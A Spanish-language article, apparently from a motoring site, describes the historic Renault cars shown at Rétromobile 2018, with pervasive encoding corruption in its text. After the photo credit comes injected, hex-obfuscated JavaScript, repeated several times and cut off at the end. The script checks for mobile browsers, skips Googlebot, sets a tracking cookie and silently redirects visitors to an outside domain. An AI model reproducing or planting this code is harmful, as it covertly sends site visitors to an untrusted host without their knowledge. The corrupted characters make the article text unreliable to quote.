RAi??tromobile 2018: el stand de Renault

Master
1972 - Renault 5
Share on FacebookTweet about this on TwitterShare on Google+Print this pageEmail this to someone

19

Para la ediciA?n 2018 del SalA?n de autos clA?sicos RAi??tromobile, Renault expone veinte vehAi??culos de su pasado que ilustran y celebran 120 aAi??os de soluciones innovadoras diseAi??adas para simplificar la vida de las personas.

Renault tiene una larga tradiciA?n de reintentar la manera en que las personas hacen uso de su automA?vil. Desde ubicar al conductor dentro del vehAi??culo a inventar el concepto de monovolA?menes compactos. La constante adaptaciA?n de los diferentes modelos de Renault a su Ai??poca para satisfacer las renovadas demandas de los automovilistas, motivA? la selecciA?n de los modelos que estarA?n en exhibiciA?n a partir de maAi??ana, cuando RAi??tromobile abra sus puertas. Estos son los automA?viles seleccionados

Renault Tipo A 1898

Todo empezA? en 1898 con el Tipo A, el primer vehAi??culo Renault. A bordo de su voiturette, Louis Renault subiA? la cuesta de la calle Lepic, en la colina de Montmartre, en ParAi??s. Gracias a una novedosa caja de velocidades provista de una toma directa y un motor ubicado adelante, el Tipo A presenta todas las caracterAi??sticas del automA?vil moderno. Los espectadores de la calle Lepic quedaron asombrados por la sencillez de la conducciA?n y la ligereza de la voiturette y comenzaron a hacer pedidos. El Tipo A impulsA? la empresa Renault FrA?res gracias a la audacia y capacidad de innovaciA?n de Louis Renault.

Renault Tipo B 1899

Preocupado por el confort de sus clientes, Louis Renault lanza el Tipo B, a menudo considerado como uno de los primeros automA?viles con conducciA?n interior de la historia. Al beneficiarse de las caracterAi??sticas del Tipo A (caja de velocidades de toma directa, transmisiA?n por A?rbol), el Tipo B fue ganando terreno. Gracias a su carrocerAi??a cerrada, los pasajeros ya no estaban expuestos a la intemperie y pudieron por fin olvidarse del abrigo de piel indispensable para protegerse del viento, la lluvia y la nieve.

Renault Tipo BD FurgA?n Postal 1909

DiseAi??ado originalmente para modernizar el parque de los antiguos A?mnibus de caballos, el Tipo BD se convirtiA? en el primer tres toneladas de la marca. Su transmisiA?n por A?rbol de cardanes y su nuevo chasis BD hicieron que este modelo pesado fuera fiable y resistente. El vehAi??culo fue celebrado por los profesionales que ofrecAi??an sus servicios a los clientes. El modelo expuesto es un furgA?n postal que permitAi??a el transporte y el reparto del correo. Gracias al mostrador de recepciA?n protegido, facilita tanto la vida de los clientes como el trabajo del administrador de correos.

Renault Tipo AG1 1910

El Tipo AG1 fue el primer taxi parisino. Sencillo y robusto, el AG1 permitAi??a transportar a los viajeros que querAi??an disfrutar del buen tiempo gracias a una novedosa cabina descapotable. En 1914, al Tipo AG1 se lo bautizA? como Ai??taxi del MarneAi?? por su participaciA?n en la Primera Guerra Mundial, donde fue utilizado para transportar a los soldados hasta el frente del rio Marne. De sencillo mantenimiento y especialmente estudiado para las necesidades de las flotas, el Tipo AG1 contribuyA? al Ai??xito internacional de Renault.

Renault Tipo KJ1 1923

1923 - Renault Type KJ1

DespuAi??s de la Primera Guerra Mundial, era necesario satisfacer las nuevas necesidades de la poblaciA?n. El Tipo KJ1 contribuyA? a la democratizaciA?n del automA?vil en los aAi??os 20. Este modelo de gama bA?sica aunaba prestaciones tAi??cnicas de calidad (motor de arranque elAi??ctrico, caja de velocidades de tres relacionesai??i??) con la accesibilidad. Se ofrecAi??a con varias carrocerAi??as a elegir: una versiA?n tres plazas en forma de Ai??trAi??bolAi??, conducciA?n interior, descapotable y torpedo para satisfacer a un gran nA?mero de clientes siendo asequible.

Renault Tipo PR 1927

A medio camino entre un automA?vil grande y un vehAi??culo comercial, este modelo dio origen a un bus ligero de diez plazas sentadas. En la mayorAi??a de los casos, estos pequeAi??os buses fueron asignados al servicio de transporte entre los hoteles y las estaciones de ferrocarril para trasladar a los turistas o a los clientes de los balnearios que viajaban en tren. Estos vehAi??culos contribuyeron asAi?? a la movilidad en una Ai??poca en la que tener un automA?vil propio reciAi??n empezaba a ser masivo. Su velocidad mA?xima era de 65 km/h.

Renault Vivastella 1933

1933 - Renault VIVASTELLA type PG7

 

A principios de los aAi??os treinta, la terminaciA?n Ai??StellaAi?? se convirtiA? en sinA?nimo de acabado de gama alta. El Vivastella era un vehAi??culo excepcional que gustaba mucho a la burguesAi??a emergente por el clasicismo de su lAi??nea y su discreciA?n. Hasta siete personas podAi??an acomodarse a bordo de este modelo modulable. Los tapizados de terciopelo y de calidad que decoraban el interior del vehAi??culo ofrecAi??an una presentaciA?n de gama alta para los pasajeros. Con su elegancia y un frente que ostentaba la famosa estrella de cinco puntas, el Vivastella era el mA?s lujoso de los seis cilindros Renault.

Renault Juvaquatre 1937

1937 - Renault JUVAQUATRE

El Juvaquatre fue el primer modelo con una carrocerAi??a toda de acero de Renault. Elegante y moderna, su primera versiA?n fue una berlina de cuatro puertas, muy apreciada por las familias con ingresos modestos. A?Hasta cinco personas podAi??an subirse a bordo e incluso estirar las piernas! DespuAi??s de la Segunda Guerra Mundial, el Juvaquatre evolucionA? como vehAi??culo comercial y fue utilizado por comerciantes, servicios pA?blicos y trabajadores autA?nomos. Con un nivel de consumo bajo y una buena maniobrabilidad, los comerciantes podAi??an recorrer largas distancias y servir a sus clientes.

Renault 4 CV 1947

DespuAi??s de la Segunda Guerra Mundial, ya era hora de que Francia volviera a la carretera. En este aspecto, el 4 CV simbolizaba el vehAi??culo de la libertad. Aplaudido por los obreros, los comerciantes y tambiAi??n por los deportistas, este automA?vil llegarAi??a a todos los pA?blicos y a todas las generaciones. Su eslogan Ai??4 puertas, 4 plazas, 4 caballosAi?? expresaba lo que lo hizo tan popular: su excepcional habitabilidad gracias a un piso plano y un motor trasero. Sencillo y bonito, el 4CV contribuyA? a la democratizaciA?n del coche de la posguerra. El 4 CV, del que se vendieron mA?s de un millA?n de ejemplares, forma parte del patrimonio automovilAi??stico nacional francAi??s.

Renault Colorale 1950

El Colorale fue, sin duda, el primer SUV de Renault y de la historia moderna del automA?vil. VehAi??culo robusto, amplio y funcional, el Colorale se movAi??a por todos los terrenos, al servicio de comerciantes, agricultores y autA?nomos. Su altura y su peldaAi??o retrA?ctil facilitaban la carga. Para adaptarse a cada situaciA?n, se ofrecAi??a en varias versiones: Prairie, taxi, furgoneta, pick-up y plataforma con toldo.

Renault Estafette 1959

1959 - Renault ESTAFETTE

El Estafette fue el primer modelo Renault con tracciA?n delantera. Este vehAi??culo comercial facilitaba la carga y descarga gracias a sus puertas laterales corredizas y a una superficie de carga plana. AdemA?s, la ausencia de capot incrementaba la visibilidad y mejoraba la seguridad. El Estafette se ofrecAi??a en varias versiones, adaptA?ndose asAi?? a una clientela diversa, desde el vendedor de helados al viajero amante del camping.

Renault 4 1961

1961 - Renault 4

DespuAi??s del 4 CV llegA? el Renault 4. Su piso plano, su asiento trasero abatible y su quinta puerta lo convirtieron en un vehAi??culo ingenioso y versA?til. TambiAi??n conocido como “el jean sobre ruedas”, el modelo ofrecAi??a una estabilidad extraordinaria. La eliminaciA?n de los puntos de engrase y su circuito de agua cerrado facilitaban su mantenimiento. ValiAi??ndose de su Ai??xito mundial, el Renault 4 era accesible y polivalente y satisfacAi??a las necesidades de la Ai??poca.

Renault 8 Gordini 1964

AmAi??dAi??e Gordini modificA? el motor “Major” de 1.108 cc ai??i??que desarrollaba unos cincuenta caballosai??i??Ai?? convirtiAi??ndolo en una mecA?nica mA?s potente al dotarle de una tapa con cA?maras de combustiA?n hemisfAi??ricas y de una alimentaciA?n a cargo de dos carburadores de doble cuerpo que permitAi??an obtener 95Ai??CV.

El vehAi??culo se lanzA? en el SalA?n del AutomA?vil de ParAi??s en octubre de 1964. El ai???Gorde” azul con bandas blancas se ganA? su reputaciA?n entre los amantes del automovilismo. El mismo aAi??o se estrenA? la Ai??Copa GordiniAi?? que contribuyA? a popularizar el mito, confirmA?ndose sus reconocidas cualidades a travAi??s de un impresionante palmarAi??s. El Renault 8 Gordini contribuyA? a democratizar el automovilismo.

Renault 16 1965

El 16 concentraba un sinfAi??n de innovaciones para el cliente. Especialmente confortable para los trayectos largos gracias a una suspensiA?n de gran recorrido, el Renault 16 permitAi??a que las familias contaran ademA?s con un gran espacio de almacenamiento en el baA?l. Aparte de la audacia arquitectA?nica de este bicuerpo ai??i??el Renault 16 es el primer vehAi??culo de fondo plano con portA?nai??i?? los clientes apreciaban su propuesta de gama alta como los levantavidrios elAi??ctricos en la parte delantera, el bloqueo central de puertas o la caja automA?tica. No fue de extraAi??ar que consiguiera ser elegido como “Auto del AAi??o” en 1965.

Renault 5 1972

El pequeAi??o 5 era el auto polivalente por excelencia que se movAi??a igual de cA?modo en la ciudad y en el campo. Moderno y dotado de una fuerte personalidad, favoreciA? el acceso de los jA?venes y de las mujeres al automA?vil. Se solAi??a utilizar como segundo vehAi??culo y resultaba prA?ctico y seguro. Se hicieron mA?ltiples versiones, tanto en Francia como a escala internacional, y fueron muchos los clientes a los que este subcompacto sedujo.

Renault 30 1975

1975 - Renault 30

Se presentA? en el SalA?n de Ginebra de 1975 y su apariciA?n supuso todo un acontecimiento tecnolA?gico. Fue el primer vehAi??culo con tracciA?n delantera de gran difusiA?n equipado con un motor V6, una direcciA?n asistida y una quinta puerta. TambiAi??n apostaba por la seguridad e incorporaba soluciones de vanguardia: una estructura de carrocerAi??a especialmente estudiada para proteger a sus ocupantes en las configuraciones de choque mA?s frecuentes y una parte delantera y trasera diseAi??adas para absorber la energAi??a de los choques por deformaciA?n progresiva.

El modelo que se presenta es el Renault 30 TX y se beneficia de mA?ltiples equipamientos adicionales: tapizado de los asientos de terciopelo, volante con funda de cuero, bloqueo central que incluye el portA?n trasero y la tapa del tanque de combustible, mando a distancia de las puertas (PLIP), Ai??NormalurAi?? de dos funciones -limitador de velocidad o regulador de velocidad electrA?nico-.

Renault 9 1981

El R9 se presentA? en el SalA?n de Frankfurt de 1981 y vino a completar la oferta de Renault en un segmento esencial del mercado europeo. Iba dirigido a una clientela en busca de un auto familiar polivalente con un costo de utilizaciA?n moderado. El Renault 9 abriA? la puerta a una polAi??tica de producto autAi??nticamente internacional. DiseAi??ado para el mercado europeo, sus cualidades econA?micas le ofrecieron una carrera aA?n mA?s internacional al surgir la segunda crisis del petrA?leo. El R9 se fabricarAi??a en todas las regiones del planeta, incluido en los Estados Unidos bajo el nombre de Renault Alliance. El Renault 9 fue elegido Ai??Auto del AAi??o 1982Ai?? por un jurado de 52 periodistas europeos.

Renault Espace 1984

En 1984, Renault innova y lanza un nuevo segmento de vehAi??culos: el monovolumen, un nuevo concepto y un icono de los “vehAi??culos para vivir”, diseAi??ado para la convivencia. Espace es extremadamente modulable gracias a sus asientos individuales desmontables e intercambiables que favorecen la conversaciA?n y la convivencia a bordo. La posiciA?n de conducciA?n alta, el piso plano y el gran volumen a bordo proporcionan un confort de conducciA?n inAi??dito. Con Espace, Renault anticipa el deseo de confort a bordo de sus clientes. ValiAi??ndose del Ai??xito de este concepto, Renault lo reproducirA? mA?s adelante en vehAi??culos mA?s compactos como ScAi??nic y Twingo.

Renault Twingo 1992

1992 - Renault TWINGO I

En 1992, los clientes quedaron conquistados por este simpA?tico monovolumen compacto que trastocA? los cA?digos del automA?vil. La modularidad de su asiento trasero deslizante ofrecAi??a mayor espacio interior. El Twingo era divertido, prA?ctico y colorido. El concepto era novedoso y sencillo: un solo modelo, una sola motorizaciA?n, un solo precio y mA?ltiples colores “flashy”.

Renault Scenic 1996

1996 - Renault SCENIC

La ScAi??nic se comercializA? a partir de 1996 y las familias lo adoptaron enseguida. Primer monovolumen compacto de la historia del automA?vil, siguiA? siendo el preferido y sedujo a los franceses durante muchos aAi??os por su modularidad, sus portaobjetos y la agradable convivencia a bordo que proporcionaba. Con ScAi??nic, Renault fue el instigador de un nuevo segmento que pronto pasA? a ser imprescindible en Europa.

Fotos: Prensa Renaultvar _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v 